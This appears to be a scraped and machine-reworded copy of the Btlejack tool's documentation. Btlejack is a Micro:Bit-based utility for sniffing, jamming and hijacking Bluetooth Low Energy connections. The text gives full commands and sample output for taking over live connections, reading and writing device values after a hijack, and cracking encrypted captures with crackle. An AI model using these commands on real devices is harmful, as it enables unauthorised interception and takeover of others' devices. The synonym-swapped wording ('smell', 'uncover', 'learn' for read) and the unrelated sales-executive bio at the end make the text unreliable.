Btlejack – Bluetooth Low Energy Swiss-army Knife

Btlejack supplies the entirety you wish to have to smell, jam and hijack Bluetooth Low Power units. It is determined by one or extra BBC Micro:Bit. units operating a devoted firmware. You might also wish to use an Adafruit’s Bluefruit LE sniffer or a nRF51822 Eval Package, as we added toughen for those units.
Present model of this device (2.0) helps BLE 4.x and 5.x. The BLE 5.x toughen is proscribed, because it does handiest toughen the 1Mbps Uncoded PHY and does now not toughen channel map updates.

Necessities
You wish to have a UNIX founded machine (as an example a Raspberry Pi). Should you use the BBC Micro:Bit, you’ll want one to three Micro:Bit units (three units really helpful) and for each and every instrument one unfastened USB port. The ability intake of a Micro:Bit is reasonably low, so you’ll use a unmarried USB port and a passive hub for powering the three really helpful gadgets.
Should you attach 3 microbits on the similar time to your laptop, Btlejack will have the ability to sniff on each promoting channel and has way more probability to seize the relationship request.


Easy methods to set up
First, set up the btlejack Python3 consumer device with Pip:

$ sudo pip3 set up btlejack

Then, attach your Micro:Bit instrument for your laptop with a USB cable, mount the related mass garage instrument (the mount level should include MICROBIT), and factor the next command:

$ btlejack -i

This may occasionally program each Micro:Bit instrument attached for your laptop, and make them able to make use of with Btlejack. It’s going to use the proper firmware model for the present consumer device, so it’s extremely really helpful to accomplish this firmware set up process each and every time you replace Btlejack.
If you’re the use of a Bluefruit LE sniffer or a nRF51822 Eval Package, then please use an exterior SWD programmer to flash your instrument with this firmware.
Stay your units attached and you are all set !
NOTE This handiest works with posix suitable methods.


Easy methods to use Btlejack
The usage of Btlejack is relatively simple. Btlejack can:

  • use more than a few units
  • sniff an current BLE connection
  • sniff new BLE connections
  • jam an current BLE connection
  • hijack an current BLE connection
  • export captured packets to more than a few PCAP codecs


Specify units to make use of
Btlejack typically tries to autodetect and use attached suitable units (Micro:Bit just for the instant), however for the reason that firmware will also be hacked or changed to paintings with different nRF51822-based forums, it supplies a particular choices to permit compatibility with those units.
The -d possibility allows you to specify one or extra units with Btlejack. Word that this selection will disable the automated detection of units, and also you will have to upload as many units as you could want:

$ btlejack -d /dev/ttyACM0 -d /dev/ttyACM2 -s



Sniffing an current connection
First, to find an current connection to focus on with btlejack:

$ btlejack -s
BtleJack model 1.1

[i] Enumerating current connections ...
[ - 54 dBm] 0xcd91d517 | pkts: 1
[ - 46 dBm] 0xcd91d517 | pkts: 2

The primary worth (in dBm) displays the facility of the sign, the better this worth is the simpler the sniffed connection shall be.
The second one worth (hex) is the related get entry to cope with, a 32-bit worth figuring out a hyperlink between two bluetooth low power suitable units.
The final worth is the collection of packets noticed with this get entry to cope with. The upper this worth is, the extra possible the corresponding get entry to cope with is used.
Then, use the -f technique to apply a particular connection:

$ btlejack -f 0xdda4845e
BtleJack model 1.1

[i] Detected sniffers:
> Sniffer #0: fw model 1.1

[i] Synchronizing with connection 0xdda4845e ...
✓ CRCInit: 0x2a035e
✓ Channel Map = 0x1fffffffff
✓ Hop period = 39
✓ Hop increment = 15
[i] Synchronized, packet seize in growth ...
LL Knowledge: 02 07 03 00 04 00 0a 03 00
LL Knowledge: 0a 08 04 00 04 00 0b 5a 69 70
LL Knowledge: 02 07 03 00 04 00 0a 03 00
LL Knowledge: 0a 08 04 00 04 00 0b 5a 69 70


If you’re the use of greater than 1 microbit, Btlejack will parallelize one of the most sniffing operations with a purpose to accelerate the relationship parametres restoration !

Sniffing for brand spanking new connections
The -c possibility supported by means of btlejack permits you to specify the objective BD cope with, or you could wish to use any to seize any new connection created.

$ btlejack -c any
BtleJack model 1.1

[i] Detected sniffers:
> Sniffer #0: model 1.1
> Sniffer #1: model 1.1
LL Knowledge: 05 22 df b4 6f 95 c5 55 c0 0a f6 99 23 40 1d 7b 2f 0a 9a f4 93 01 12 00 27 00 00 00 d0 07 ff ff ff ff 1f 0b
[i] Were given CONNECT_REQ packet from 55:c5:95:6f:b4:df to 40:23:99:f6:0a:c0
|-- Get right of entry to Cope with: 0x0a2f7b1d
|-- CRC Init worth: 0x93f49a
|-- Hop period: 39
|-- Hop increment: 11
|-- Channel Map: 1fffffffff
|-- Timeout: 20000 ms

LL Knowledge: 03 09 08 0f 00 00 00 00 00 00 00
LL Knowledge: 03 09 08 0f 00 00 00 00 00 00 00
LL Knowledge: 0b 06 0c 08 0f 00 09 41
LL Knowledge: 03 06 0c 07 1d 00 d3 07

or you might also wish to specify the objective BD cope with:

$ btlejack -c 03:e1:f0:00:11:22



Jamming a connection
As soon as a connection known by means of its get entry to cope with, you’ll supply jam it by means of the use of the -j possibility:

$ btlejack -f 0x129f3244 -j̀



Hijacking a BLE connection
Btlejack may be ready to hijack an current connection, use the -t possibility to take action. As soon as hijacked, Btlejack offers you a recommended permitting you to engage with the hijacked instrument.
First, hijack an current connection:

$ btlejack -f 0x9c68fd30 -t -m 0x1fffffffff
BtleJack model 1.1

[i] The usage of cached parameters (created on 2019-08-11 01:48:24)
[i] Detected sniffers:
> Sniffer #0: fw model 1.1

[i] Synchronizing with connection 0x9c68fd30 ...
✓ CRCInit: 0x81f733
✓ Channel map is supplied: 0x1fffffffff
✓ Hop period = 39
✓ Hop increment = 9
[i] Synchronized, hijacking in growth ...
[i] Connection effectively hijacked, it's all yours o/
btlejack>

Then use the next instructions to engage with the instrument: – uncover: plays products and services and traits enumeration, offers you the entire details about products and services and traits – write: write knowledge to a particular worth maintain – learn: learn knowledge from a particular worth maintain – ll: sends a uncooked link-layer packet (for ninjas)


uncover command
The uncover command will ship and obtain Bluetooth LE packets and retrieve the entire products and services UUIDs and parameters, in addition to traits UUIDs and parameters:

btlejack> uncover
get started: 0001 finish: 0005
get started: 0014 finish: 001a
get started: 0028 finish: ffff
Found out products and services:
Provider UUID: 1801
Function UUID: 2a05
| maintain: 0002
| homes: point out (20)
worth maintain: 0003

Provider UUID: 1800
Function UUID: 2a04
| maintain: 0019
| homes: learn (02)
worth maintain: 001a

Function UUID: 2a00
| maintain: 0015
| homes: learn (02)
worth maintain: 0016

Function UUID: 2a01
| maintain: 0017
| homes: learn (02)
worth maintain: 0018

Provider UUID: 1824
Function UUID: 2abc
| maintain: 0029
| homes: write point out (28)
worth maintain: 002a



learn command
The learn command accepts a unmarried parameter, the price maintain akin to the function you need to learn from:

btlejack> learn 0x16
learn>> 4c 47 20 77 65 62 4f 53 20 54 56


write command
The write command accepts three parameters:

btlejack> write   

Supported knowledge codecs:

  • hex: hex knowledge (i.e. “414261”)
  • str: textual content string, is also encapsulated in double quotes



ll command
This final command permits you to ship Bluetooth Low Power Hyperlink-layer PDUs, in hex shape, as laid out in Quantity 6, Phase B, Bankruptcy 2.4.


PCAP document export
One attention-grabbing function of Btlejack is the likelihood to export the captured knowledge to a PCAP document.
Btlejack helps the next DLT codecs:

  • DLT_BLUETOOTH_LE_LL_WITH_PHDR (similar)
  • DLT_NORDIC_BLE (the one utilized by Nordic’ sniffer)
  • DLT_BLUETOOTH_LE_LL (supported on newest variations of Wireshark)

The output document is also specified the use of the -o possibility, whilst the output layout is also specified with the -x possibility. Legitimate codecs values are: ll_phdr, nordic, or pcap (default).

$ btlejack -f 0xac56bc12 -x nordic -o seize.nordic.pcap

The ll_phdr export sort turns out to be useful when sniffing an encrypted connection, as it’s also supported by means of crackle. So if you wish to sniff and wreck encrypted connections, that is find out how to move.
You might also wish to inform crackle to make use of a particular cracking technique, by means of the use of the -s possibility:

$ crackle -i some.pcap -s 1



Connection cache
Btlejack makes use of a connection cache to retailer some connection-related worth with a purpose to accelerate issues somewhat. This connection cache would possibly motive some issues, particularly if an get entry to cope with has been in the past noticed.
This cache will also be flushed with the -z possibility:

$ btlejack -z



Dumping reside packets with Wireshark
Btlejack 2.0 introduces a brand new -w possibility that permits you to specify a FIFO trail (current or now not) so as to accomplish packets reside research:

$ btlejack -c any -w /tmp/blepipe

You’ll be able to even use a FIFO and an output document as the similar time:

$ btlejack -c any -w /tmp/blepipe -o blepackets.pcap



Trace for the use of btlejack on a Raspberry Pi
In case you have in the past enabled digital ethernet over USB (RNDIS), e.g. to setup a Raspberry Pi 0 W over USB, you wish to have to disable this once more (i.e. take away dtoverlay=dwc2 from boot/config.txt and modules-load=dwc2,g_ether from boot/cmdline.txt, then sudo reboot), as a result of this may in a different way intervene with the sniffers’ USB connections.


Bluetooth LE 5 & 5.1 toughen
This model helps Bluetooth Low Power variations 5 and 5.1 and particularly the brand new channel selectrion set of rules presented in model 5 (CSA #2). On the other hand, for the reason that hardware used does now not toughen the two new PHYs added from model 5, it is going to handiest be ready to smell, jam, and perhaps hijack connections the use of the 1Mbps uncoded PHY.
Please additionally be aware that the present implementation of CSA #2 incorporated in Btlejack does now not toughen channel map updates, for the instant.


Sniffing a brand new BLE 5 connection
Btlejack mechanically detects the channel variety set of rules used, so that you do not need to fret and simply seize packets as same old.


Sniffing an current BLE 5 connection
Sniffing an current BLE 5 connection (that makes use of the 1Mbps uncoded PHY, and handiest this PHY) isn’t so tricky. First, you should specify that you need to focus on a BLE 5 connection, by means of the use of the -5 possibility. Please be aware that there is not any option to inform if an current connection makes use of CSA #2 or CSA #1, so you have got to take a look at each tactics till one works.

$ btlejack -f 0x11223344 -5

Btlejack will then get better the channel map used after which the hop period worth:

$ btlejack -f 0x11223344 -5
[i] Synchronizing with connection 0x11223344 ...
✓ CRCInit: 0x40d64f
✓ Channel Map = 0x1fffffffff
✓ Hop period = 160

It’s going to then attempt to get better this connection PRNG counter worth:

$ btlejack -f 0x11223344 -5
[i] Synchronizing with connection 0x11223344 ...
✓ CRCInit: 0x40d64f
✓ Channel Map = 0x1fffffffff
✓ Hop period = 160
✓ CSA2 PRNG counter = 5137
[i] Synchronized, packet seize in growth ...

As soon as accomplished, Btlejack is synchronized with this connection and can procedure packets as same old.


Jamming an current BLE 5 connection
Not anything new right here, except for that you simply should specify that you’re attacking a BLE 5 connection, by means of the use of the -5 possibility.
Please be aware that you’ll optimize this assault by means of additionally specifying the channel map and hop period worth to make use of, by means of the use of respectively the -m and -p flags. Each of them MUST be supplied, except it will now not paintings.


Hijacking an current BLE 5 connection
I didn’t set up to hijack a BLE 5 connection at the moment, as this assault is time-sensitive. My BLE 5 units use a latency of 0, thus permitting no extend and inflicting this assault to fail.
When I will be able to get my fingers on some legit BLE 5 units, I will be able to support this.

Obtain Btlejack

Published by Marshmallow

Marshmallow Android is BT Ireland’s Head of Sales for Republic of Ireland domestic multi-site companies, indigenous MNCs and public sector accounts. He is responsible for the direction and control of all sales activity in the region. He has over 10 years management experience from high growth start-ups to more established businesses. He’s led teams in Ireland, India and China across various industries (ICT, On-Line Recruitment, Corporate Training and International Education).